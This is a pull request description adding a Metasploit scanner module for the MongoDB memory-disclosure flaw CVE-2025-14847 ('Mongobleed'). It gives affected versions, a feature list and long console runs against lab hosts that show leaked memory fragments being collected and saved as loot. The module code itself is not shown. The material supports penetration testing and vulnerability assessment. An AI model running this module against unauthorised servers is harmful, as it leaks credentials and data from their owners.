Add MongoDB memory disclosure module (CVE-2025-14847)

[xaitax]

Summary

This PR adds a new auxiliary scanner module for CVE-2025-14847 (Mongobleed), a memory disclosure vulnerability in MongoDB's zlib decompression handling.

Vulnerability

By sending crafted OP_COMPRESSED messages with inflated BSON document lengths, attackers can leak server memory contents without authentication. Leaked data may include credentials, session tokens, connection strings, and application data.

Affected Versions

Per MongoDB JIRA SERVER-115508:

• MongoDB 3.6.x, 4.0.x, 4.2.x (EOL, no fix)
• MongoDB 4.4.0 - 4.4.29 (fixed in 4.4.30)
• MongoDB 5.0.0 - 5.0.31 (fixed in 5.0.32)
• MongoDB 6.0.0 - 6.0.26 (fixed in 6.0.27)
• MongoDB 7.0.0 - 7.0.27 (fixed in 7.0.28)
• MongoDB 8.0.0 - 8.0.16 (fixed in 8.0.17)
• MongoDB 8.2.0 - 8.2.2 (fixed in 8.2.3)

Features

• Automatic version detection and vulnerability assessment
• Multi-pass scanning for maximum data collection
• Quick scan mode for fast vulnerability confirmation
• Secret pattern detection with configurable regex
• Hex dump output option
• Progress tracking with ETA

Verification

Tested against several MongoDB versions.

Regular scan

msf auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
[*] 192.168.1.100:27017  - MongoDB version: 4.2.3
[+] 192.168.1.100:27017  - Version 4.2.3 is VULNERABLE (EOL, no fix available)
[*] 192.168.1.100:27017  - Scanning 8173 offsets (20-8192, step=1)
[!] 192.168.1.100:27017  - Secret pattern detected at offset 20: 'conn' in context: ...[conn72889] end connectio...
[+] 192.168.1.100:27017  - offset=20   len=82  : [conn72889] end connection 192.168.1.23:39451 (0 connections now open).321ea32
[+] 192.168.1.100:27017  - offset=117  len=16  : ....l..`J-*.-NgP
[+] 192.168.1.100:27017  - offset=379  len=377 : .U..C....F.$..J$E..<8......1(.F.m6.)PTb....QN.t-..w......E..>D.;........YG_.....
[+] 192.168.1.100:27017  - offset=501  len=40  : id bson type in element with field name
[*] 192.168.1.100:27017  - Progress: 500/8173 (6.1%) - 6 leaks found - ETA: 103s
[+] 192.168.1.100:27017  - offset=778  len=251 : ......0..ZT.[....(..W......T...PRY...........W.P.Y..............N...v.O..D....)]
[*] 192.168.1.100:27017  - Progress: 1000/8173 (12.2%) - 7 leaks found - ETA: 97s
[+] 192.168.1.100:27017  - offset=1141 len=15  : T./S./.K.dZ1.((
[*] 192.168.1.100:27017  - Progress: 1500/8173 (18.4%) - 8 leaks found - ETA: 91s
[+] 192.168.1.100:27017  - offset=1594 len=12  :  field name
[+] 192.168.1.100:27017  - offset=1757 len=39  : d bson type in element with field name
[+] 192.168.1.100:27017  - offset=1774 len=13  : h field name
[+] 192.168.1.100:27017  - offset=1776 len=11  : field name
[+] 192.168.1.100:27017  - offset=1778 len=18  : t with field name
[*] 192.168.1.100:27017  - Progress: 2000/8173 (24.5%) - 15 leaks found - ETA: 84s
[+] 192.168.1.100:27017  - offset=2038 len=39  : id bson type in element with fiel..aS.V
[*] 192.168.1.100:27017  - Progress: 2500/8173 (30.6%) - 17 leaks found - ETA: 77s
[+] 192.168.1.100:27017  - offset=2805 len=146 : ...86....0h..g....2H........E..Dk,.Yn..........=f[d0.}...;.."...7...w.i.......|M
[*] 192.168.1.100:27017  - Progress: 3000/8173 (36.7%) - 19 leaks found - ETA: 70s
[*] 192.168.1.100:27017  - Progress: 3500/8173 (42.8%) - 19 leaks found - ETA: 63s
[*] 192.168.1.100:27017  - Progress: 4000/8173 (48.9%) - 19 leaks found - ETA: 57s
[*] 192.168.1.100:27017  - Progress: 4500/8173 (55.1%) - 19 leaks found - ETA: 50s
[+] 192.168.1.100:27017  - offset=4570 len=38  :  bson type in element with field name
[+] 192.168.1.100:27017  - offset=4597 len=241 : ..v.;.0z~.A[H<[..8.C.8...h.c..R...dd.M6....i)....Y.....=}.I.!...>:..}.<.....Z:.~
[*] 192.168.1.100:27017  - Progress: 5000/8173 (61.2%) - 21 leaks found - ETA: 43s
[*] 192.168.1.100:27017  - Progress: 5500/8173 (67.3%) - 21 leaks found - ETA: 36s
[*] 192.168.1.100:27017  - Progress: 6000/8173 (73.4%) - 21 leaks found - ETA: 29s
[+] 192.168.1.100:27017  - offset=6133 len=22  : ......;...#..B...-...R
[+] 192.168.1.100:27017  - offset=6134 len=249 : ......;...#..B...-...R.i..Es.a...J.5..,.....=;-e..K....z....O.........y......k].
[*] 192.168.1.100:27017  - Progress: 6500/8173 (79.5%) - 23 leaks found - ETA: 23s
[*] 192.168.1.100:27017  - Progress: 7000/8173 (85.6%) - 23 leaks found - ETA: 16s
[*] 192.168.1.100:27017  - Progress: 7500/8173 (91.8%) - 23 leaks found - ETA: 9s
[*] 192.168.1.100:27017  - Progress: 8000/8173 (97.9%) - 23 leaks found - ETA: 2s

[+] 192.168.1.100:27017  - Total leaked: 1638 bytes
[+] 192.168.1.100:27017  - Unique fragments: 23
[+] 192.168.1.100:27017  - Leaked data saved to: /root/.msf4/loot/20251230130757_default_192.168.1.100_mongodb.memory_l_746607.bin

[!] 192.168.1.100:27017  - Potential secrets detected:
[!] 192.168.1.100:27017  -   - Pattern 'conn' at offset 20 (pos 1): ...[conn72889] end connectio...
[*] 192.168.1.100:27017  - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Quick & Repeated scan

msf auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set REPEAT 3
REPEAT => 3
msf auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set QUICK_SCAN true
QUICK_SCAN => true
msf auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
[*] 192.168.1.100:27017  - MongoDB version: 4.2.3
[+] 192.168.1.100:27017  - Version 4.2.3 is VULNERABLE (EOL, no fix available)
[*] 192.168.1.100:27017  - Running 3 scan passes to maximize data collection...
[*] 192.168.1.100:27017  - === Pass 1/3 ===
[*] 192.168.1.100:27017  - Scanning 152 offsets (20-8192, step=1, quick mode)
[!] 192.168.1.100:27017  - Secret pattern detected at offset 20: 'conn' in context: ...[conn81063] end connectio...
[+] 192.168.1.100:27017  - offset=20   len=82  : [conn81063] end connection 192.168.1.23:33343 (0 connections now open).321ea32
[+] 192.168.1.100:27017  - offset=404  len=377 : .U..C....F.$..J$E..<8......1(.F.m6.)PTb....QN.t-..w......E..>D.;........YG_.....
[+] 192.168.1.100:27017  - offset=502  len=40  : id bson type in element with field name
[+] 192.168.1.100:27017  - offset=2042 len=39  : id bson type in element with fiel..aS.V
[+] 192.168.1.100:27017  - offset=3476 len=205 : ...8.....0h..g......:N;./..1.j+..X2..&.........i).=.0,...............q^.;.i..Z..
[+] 192.168.1.100:27017  - offset=3476 len=38  :  bson type in element with field name
[+] 192.168.1.100:27017  - offset=3604 len=158 : ....Adb#...R?.B..z..(n...!0;.qh..k{...wW,.N..25.....i..9.......f[...L..0.t......
[+] 192.168.1.100:27017  - offset=6292 len=188 : ......;..G.....e[..9.......8FQm%..KF...c....=;-e.1.....z....O..c.......P..S{....
[*] 192.168.1.100:27017  - Pass 1 complete: 11 new leaks (11 total unique)
[*] 192.168.1.100:27017  - === Pass 2/3 ===
[*] 192.168.1.100:27017  - Scanning 152 offsets (20-8192, step=1, quick mode)
[!] 192.168.1.100:27017  - Secret pattern detected at offset 20: 'conn' in context: ...id.244.214:40627 (0 connections now open).kn...
[+] 192.168.1.100:27017  - offset=20   len=82  :  found in object with unknown _id.244.214:40627 (0 connections now open).known _
[*] 192.168.1.100:27017  - Pass 2 complete: 1 new leaks (12 total unique)
[*] 192.168.1.100:27017  - === Pass 3/3 ===
[*] 192.168.1.100:27017  - Scanning 152 offsets (20-8192, step=1, quick mode)
[+] 192.168.1.100:27017  - offset=20   len=33  :  found in object with unknown _id
[*] 192.168.1.100:27017  - Pass 3 complete: 1 new leaks (13 total unique)

[+] 192.168.1.100:27017  - Total leaked: 1256 bytes
[+] 192.168.1.100:27017  - Unique fragments: 13
[+] 192.168.1.100:27017  - Leaked data saved to: /root/.msf4/loot/20251230131112_default_192.168.1.100_mongodb.memory_l_881723.bin

[!] 192.168.1.100:27017  - Potential secrets detected:
[!] 192.168.1.100:27017  -   - Pattern 'conn' at offset 20 (pos 1): ...[conn81063] end connectio...
[!] 192.168.1.100:27017  -   - Pattern 'conn' at offset 20 (pos 51): ...id.244.214:40627 (0 connections now open).kn...
[*] 192.168.1.100:27017  - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

References

• https://www.wiz.io/blog/mongobleed-cve-2025-14847-exploited-in-the-wild-mongodb
• https://jira.mongodb.org/browse/SERVER-115508

[dledda-r7]

msf auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run

[!] 127.0.0.1:27017       - Could not determine MongoDB version
[*] 127.0.0.1:27017       - Proceeding with exploitation attempt...
[*] 127.0.0.1:27017       - Scanning 8173 offsets (20-8192, step=1)
[+] 127.0.0.1:27017       - offset=393  len=315 :  144 11 22 26 0 1 20 0 51 0 40356 3862147072 57685 18446744073709551615 94376708
[*] 127.0.0.1:27017       - Progress: 500/8173 (6.1%) - 5 leaks found - ETA: 15s
[*] 127.0.0.1:27017       - Progress: 1000/8173 (12.2%) - 11 leaks found - ETA: 14s
[*] 127.0.0.1:27017       - Progress: 1500/8173 (18.4%) - 13 leaks found - ETA: 13s
[*] 127.0.0.1:27017       - Progress: 2000/8173 (24.5%) - 19 leaks found - ETA: 12s
[+] 127.0.0.1:27017       - offset=2293 len=92  : x\u0010f\u0005\u0003BY\u00026\b...7.6_.$1\u0017.YD\u001asa\u0007 s.6X\u001aC.J.f
[*] 127.0.0.1:27017       - Progress: 2500/8173 (30.6%) - 21 leaks found - ETA: 11s
[*] 127.0.0.1:27017       - Progress: 3000/8173 (36.7%) - 21 leaks found - ETA: 10s
[*] 127.0.0.1:27017       - Progress: 3500/8173 (42.8%) - 21 leaks found - ETA: 9s
[*] 127.0.0.1:27017       - Progress: 4000/8173 (48.9%) - 23 leaks found - ETA: 8s
[*] 127.0.0.1:27017       - Progress: 4500/8173 (55.1%) - 23 leaks found - ETA: 7s
[*] 127.0.0.1:27017       - Progress: 5000/8173 (61.2%) - 23 leaks found - ETA: 6s
[*] 127.0.0.1:27017       - Progress: 5500/8173 (67.3%) - 23 leaks found - ETA: 5s
[*] 127.0.0.1:27017       - Progress: 6000/8173 (73.4%) - 23 leaks found - ETA: 4s
[*] 127.0.0.1:27017       - Progress: 6500/8173 (79.5%) - 24 leaks found - ETA: 3s
[+] 127.0.0.1:27017       - offset=6660 len=38  :  requested with cache fill ratio < 25%
[*] 127.0.0.1:27017       - Progress: 7000/8173 (85.6%) - 26 leaks found - ETA: 2s
[*] 127.0.0.1:27017       - Progress: 7500/8173 (91.8%) - 26 leaks found - ETA: 1s
[*] 127.0.0.1:27017       - Progress: 8000/8173 (97.9%) - 26 leaks found - ETA: 0s

[+] 127.0.0.1:27017       - Total leaked: 514 bytes
[+] 127.0.0.1:27017       - Unique fragments: 26
[+] 127.0.0.1:27017       - Leaked data saved to: /home/j/.msf4/loot/20251230143158_default_127.0.0.1_mongodb.memory_l_080581.bin
[*] 127.0.0.1:27017       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) >

[dledda-r7]

Release Notes

This adds an auxiliary scanner module that exploits mongobleed (CVE-2025-14847) to dump memory from a live instance of the NoSQL database